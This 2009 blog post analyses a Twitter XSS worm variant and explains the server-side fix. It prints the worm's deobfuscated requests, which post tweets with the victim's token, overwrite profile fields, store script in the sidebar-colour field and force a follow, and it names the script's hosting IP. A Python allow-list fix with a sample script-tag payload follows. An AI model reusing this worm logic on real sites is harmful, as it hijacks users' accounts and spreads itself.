News from Apr 17, 2009
It's back, but this time it seems like they're jealous of Mikeyy getting a new job. Somebody hacked his site and actually stored the new XSS script on it.
This script is now hosted at 74.200.253.195/xss.js, an address which, according to this blog, used to host Mikeyy's sites (Haxyou.com, Michangelomooney.com and Stalkdaily.com). I tried to resolve the domains but got server timeouts; probably the DNS records for the domains were changed too, which is why the script uses the IP address instead of the host name.
What's new is that the script exploits another field that is not validated, meaning that Twitter has not cleaned up their mess. As I've pointed out before, they have to validate every parameter of every posted request, not just the ones already known to be abused.
```javascript
// Excerpt from the worm's deobfuscated script (identifiers are the worm's own
// obfuscated names; bypassEncode and xss are defined elsewhere in the script).
// Each request reuses the victim's session and CSRF token (_0x4874x15).

// 1. Post a status update on the victim's behalf.
var _0x4874x1b = new XHConn();
_0x4874x1b.connect("/status/update", "POST",
  "authenticity_token=" +
  _0x4874x15 + "&status=" + _0x4874x1a +
  "&return_rendered_status=true&twttr=true");

// 2. Overwrite the account's name, URL, description and location.
var _0x4874x1c = new XHConn();
_0x4874x1c.connect("/account/settings", "POST",
  "authenticity_token=" + _0x4874x15 +
  "&user[name]=" + bypassEncode +
  "&user[url]=" + bypassEncode +
  "&user[description]=" + bypassEncode +
  "&user[location]=" + bypassEncode +
  "&user[protected]=0&commit=Save");

// 3. The new vector: the sidebar border colour field is not validated,
//    so the payload is stored there and rendered into the profile page.
var _0x4874x1d = new XHConn();
_0x4874x1d.connect("/account/profile_settings", "POST",
  "authenticity_token=" +
  _0x4874x15 + "&user[profile_sidebar_border_color]=" +
  xss + " &commit=save+changes");

// 4. Follow a fixed user id.
var _0x4874x1e = new XHConn();
_0x4874x1e.connect("/friendships/create/32336151", "POST",
  "authenticity_token=" + _0x4874x15 + "&twttr=true");
```
The code is injected into the profile sidebar border color. What's funny too is that it adds a friendship to user #32336151... I haven't figured out who that is yet...
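The fix on the server side is to treat a colour field as a colour and nothing else. The following is an added example (not Twitter's code, and not from the worm) of how a settings handler could allow-list the `profile_sidebar_border_color` parameter and still escape it on output; the form dictionaries and the payload string are constructed for the demonstration.

```python
import re
import html

# Strict allow-list for the sidebar border colour field: a 3- or 6-digit
# hex value, optionally with a leading '#'. Anything else is rejected
# outright rather than "cleaned", so a payload never reaches the page.
HEX_COLOR = re.compile(r"^#?(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})$")

def normalize_color(value):
    """Return the colour as '#rrggbb' (lower-case), or None if invalid."""
    if value is None:
        return None
    value = value.strip()
    if not HEX_COLOR.match(value):
        return None
    digits = value.lstrip("#").lower()
    if len(digits) == 3:                    # expand #abc to #aabbcc
        digits = "".join(c * 2 for c in digits)
    return "#" + digits

def validate_profile_settings(form, allowed=("profile_sidebar_border_color",)):
    """Validate every colour field in a posted settings form.

    Returns (clean_values, errors). Only allow-listed fields are kept,
    so a parameter the handler does not expect can never slip through.
    """
    clean, errors = {}, {}
    for name in allowed:
        color = normalize_color(form.get(name))
        if color is None:
            errors[name] = "must be a hex colour such as #87bc44"
        else:
            clean[name] = color
    return clean, errors

def render_sidebar_style(color):
    """Build the inline style attribute. The value is escaped even though it
    was validated, so the defence does not rest on a single check."""
    return 'style="border-color: %s"' % html.escape(color, quote=True)

# Constructed sample requests: a legitimate update and one carrying a
# generic script tag in the colour field (hypothetical, not the worm's payload).
GOOD_FORM = {"profile_sidebar_border_color": "87BC44", "commit": "save changes"}
BAD_FORM = {"profile_sidebar_border_color": '"><script>alert(1)</script>',
            "commit": "save changes"}
```

Running `validate_profile_settings(BAD_FORM)` yields no clean values and an error for the colour field, while the good form normalises to `#87bc44`.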